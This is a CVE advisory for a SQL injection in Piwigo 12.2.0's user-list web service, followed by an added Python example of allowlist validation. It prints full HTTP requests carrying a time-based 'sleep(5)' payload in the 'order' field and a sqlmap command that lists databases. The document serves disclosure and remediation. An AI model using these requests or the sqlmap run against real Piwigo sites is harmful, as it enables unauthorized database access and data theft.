## Headline

CVE-2022-26266: Vul/Piwigo_12.2.0_SQLinject.md at main · JCCD/Vul

Piwigo v12.2.0 was discovered to contain a SQL injection vulnerability via pwg.users.php.
## Vulnerability details

- Vulnerability type: SQL injection
- Affected version: Piwigo 12.2.0
- Vulnerable URL: http://10.92.66.148/piwigo/ws.php?format=json&method=pwg.users.getList
- Injected field: `order`
## Verification procedure

Log in to the system and go to user management, user list. Vulnerability data:

```http
POST /piwigo/ws.php?format=json&method=pwg.users.getList HTTP/1.1
Host: 10.92.66.148
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 101
Origin: http://10.92.66.148
Connection: close
Referer: http://10.92.66.148/piwigo/admin.php?page=user_list
Cookie: pwg_id=pkl5bk0ifq21ss8nb2j126u55j; pwg_display_thumbnail=no_display_thumbnail; pwg_album_manager_view=tile; pwg_plugin_manager_view=classic; pwg_user_manager_view=line; PHPSESSID=2a8da2cbc685d8412cbf8e64

display=all&order=(select*from(select+sleep(5)union/**/select+1)a)&page=0&per_page=5&exclude%5B%5D=2
```
Place a `sleep(5)` payload in the `order` field so that the injected SQL statement executes with a delay of 5 seconds. As shown in the following figure, the response is returned after a 5-second delay, proving that SQL injection exists.

Use sqlmap to verify the vulnerability. The injection point is marked with `*` in the request:

```http
POST /piwigo/ws.php?format=json&method=pwg.users.getList HTTP/1.1
Host: 10.92.66.148
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 55
Origin: http://10.92.66.148
Connection: close
Referer: http://10.92.66.148/piwigo/admin.php?page=user_list
Cookie: pwg_id=pkl5bk0ifq21ss8nb2j126u55j; pwg_display_thumbnail=no_display_thumbnail; pwg_album_manager_view=tile; pwg_plugin_manager_view=classic; pwg_user_manager_view=line; PHPSESSID=2a8da2cbc685d8412cbf8e64

display=all&order=*&page=0&per_page=5&exclude%5B%5D=2
```
Execution parameters:

```shell
py -3 sqlmap.py -r text.txt --batch --dbs
```

You can see that the database names have been read, so sensitive data can be dumped directly from the database. Furthermore, if the database account has DBA privileges, an attacker can take over the server.
## Vulnerability analysis

By analyzing the PHP files included from ws.php together with the parameters in the request, the call can be traced back to pwg.users.php.

pwg.users.php is located at `\include\ws_functions\pwg.users.php`. The `order` parameter is concatenated directly into the SQL statement that builds the query, and the value passed in is never validated, which results in SQL injection.
## Vulnerability fix

- Use prepared (precompiled) statements for query parameters and filter special characters such as single and double quotation marks.
- Perform a global review for SQL injection so that other injection points are caught as well.
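One caveat for the fix above, as it applies to the `order` parameter described in the analysis: an ORDER BY column is an identifier, not a value, so it cannot be bound as a prepared-statement parameter; the parameter has to be validated against an allowlist before it is placed in the query. The following added example (not Piwigo's code) shows the concatenation pattern beside an allowlist-based clause builder that rejects the advisory's payload; the column names in the allowlist are an assumption for the example.

```python
import re

# Allowlist of columns a caller may sort by. This list is an assumption for the
# example, not the columns pwg.users.getList actually exposes.
ALLOWED_ORDER_COLUMNS = {"id", "username", "level", "email", "last_visit"}

# One "column [asc|desc]" item. Parentheses, subselects, comments and stacked
# statements do not match this pattern and are therefore rejected.
_ORDER_ITEM = re.compile(r"^\s*([A-Za-z_][A-Za-z0-9_]*)(?:\s+(asc|desc))?\s*$", re.I)


def build_order_by(order_param: str) -> str:
    """Turn an untrusted `order` value into a safe ORDER BY clause or raise ValueError."""
    clauses = []
    for item in order_param.split(","):
        match = _ORDER_ITEM.match(item)
        if not match:
            raise ValueError(f"rejected order item: {item!r}")
        column = match.group(1).lower()
        direction = (match.group(2) or "asc").upper()
        if column not in ALLOWED_ORDER_COLUMNS:
            raise ValueError(f"unknown sort column: {column!r}")
        clauses.append(f"`{column}` {direction}")
    return "ORDER BY " + ", ".join(clauses)


def vulnerable_query(order_param: str) -> str:
    """The pattern the advisory describes: the parameter is concatenated into SQL."""
    return f"SELECT * FROM users ORDER BY {order_param}"


def hardened_query(order_param: str) -> str:
    """Same query, but the clause is built only from allowlisted identifiers."""
    return "SELECT * FROM users " + build_order_by(order_param)


def is_safe_order(order_param: str) -> bool:
    """True when the value would be accepted by the allowlist builder."""
    try:
        build_order_by(order_param)
        return True
    except ValueError:
        return False


# The advisory's time-based payload (URL-decoded), used here as a constructed test input.
PAYLOAD = "(select*from(select sleep(5)union/**/select 1)a)"

if __name__ == "__main__":
    print(vulnerable_query(PAYLOAD))                 # payload lands verbatim in the SQL
    print(hardened_query("username, last_visit desc"))
    print(is_safe_order(PAYLOAD))                    # False
```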